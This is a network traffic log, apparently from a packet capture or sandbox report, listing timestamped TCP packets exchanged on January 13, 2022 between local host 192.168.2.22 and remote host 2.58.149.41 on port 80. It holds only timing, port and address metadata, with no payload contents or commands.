                                                                          Jan 13, 2022 18:17:00.293836117 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293839931 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293865919 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293869972 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293874025 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293890953 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293906927 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293908119 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293922901 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293922901 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293940067 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293941975 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293956041 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293956995 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293972969 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.293973923 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293992043 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.293992043 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.294008017 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.294008017 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.294023037 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.294025898 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.294039011 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.294044018 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.294054985 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.294061899 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.294070005 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.294080019 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.294095993 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.294101954 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.294117928 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.294121981 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.294137001 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.294153929 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.294250965 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.320724964 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.320763111 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.320779085 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.320796967 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.320812941 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.320828915 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.320880890 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321006060 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321039915 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321042061 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321048975 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321074963 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321079016 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321093082 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321108103 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321115017 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321125984 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321129084 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321142912 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321144104 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321161032 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321161032 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321176052 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321177959 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321192980 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321196079 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321209908 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321212053 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321228981 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321229935 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321244955 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321247101 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321264029 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321270943 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321281910 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321281910 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321296930 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321299076 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321316004 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321316004 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321331978 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321332932 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321348906 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321351051 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321367979 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321367979 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321382999 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321383953 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321398973 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321402073 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321418047 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321419954 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321430922 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321434975 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321450949 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321454048 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321464062 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321469069 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321479082 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321485996 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.321496010 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.321502924 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.351046085 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.351047039 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.351062059 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.351063013 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.351078033 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.351080894 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.351094007 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.351097107 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.351109982 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.351109982 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.351126909 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.351128101 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.351142883 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.351144075 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.351159096 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.351161003 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.351174116 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.351175070 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.351191044 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.351190090 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.351205111 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.351207018 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.351222038 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.351223946 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.351238966 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.351238966 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.351253986 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.351254940 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.351269960 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.351285934 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.352371931 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.352895975 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.375673056 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.375706911 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.375720024 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.375735998 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.375752926 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.375768900 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.375787973 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.375804901 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.375812054 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.375821114 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.375833988 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.375838995 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.375840902 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.375858068 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.375859976 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.375874996 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.375879049 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.375893116 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.375894070 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.375910997 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.375911951 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.375927925 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.375931025 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.375943899 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.375943899 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.375961065 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.375961065 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.375977993 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.375978947 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.375996113 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.375997066 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376010895 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376013041 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376029015 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376030922 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376048088 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376050949 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376060963 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376065016 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376080036 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376080036 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376094103 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376096010 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376111984 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376115084 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376127958 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376133919 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376144886 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376152039 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376159906 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376168013 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376182079 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376184940 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376199007 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376202106 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376215935 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376219034 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376235008 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376235962 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376252890 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376252890 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376266003 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376269102 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376283884 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376286983 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376297951 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376302958 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376315117 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376319885 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376332045 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376337051 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376352072 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376353979 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376365900 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376369953 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376385927 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376400948 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376410007 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376415014 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376418114 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376419067 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376435041 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376435041 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376450062 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376452923 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376468897 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376470089 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376485109 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376486063 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376502037 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376502991 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376514912 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376519918 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376534939 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376535892 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376552105 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376552105 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376568079 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376569033 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376584053 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376586914 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376604080 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376605034 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376616001 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376621008 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376631975 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376638889 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376656055 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376657009 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376671076 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376672983 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376688004 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376692057 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376702070 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376708984 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376718998 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376727104 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376739979 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376745939 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376758099 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376761913 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376775980 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376777887 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376794100 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376796007 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376811028 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376812935 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376827955 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376837969 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376843929 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376853943 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376861095 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376868963 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376878023 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376883030 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376893997 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376900911 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376913071 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376919031 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376930952 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376948118 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376954079 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376957893 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376966000 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376977921 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376981974 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.376982927 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.376998901 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377002954 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377021074 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377022028 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377037048 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377042055 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377055883 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377057076 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377073050 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377074003 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377089977 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377091885 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377109051 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377109051 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377121925 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377140045 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377146959 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377156973 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.377163887 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.377173901 CET80491672.58.149.41192.168.2.22
Timestamp                            SrcPort  DstPort  Source IP       Dest IP
Jan 13, 2022 18:17:00.377187967 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377190113 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377207994 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377217054 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377223969 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377240896 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377248049 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377258062 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377274036 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377281904 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377290010 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377300024 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377306938 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377317905 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377324104 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377334118 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377340078 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377351046 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377357960 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377367973 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377373934 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377384901 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377389908 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377403975 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377407074 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377422094 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377429008 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377438068 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377444983 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377454042 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377460003 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377470016 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377480030 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377486944 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377504110 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377506971 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377518892 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377525091 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377535105 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377541065 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377552032 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377552032 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377568960 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377577066 CET  49167    80       192.168.2.22    2.58.149.41
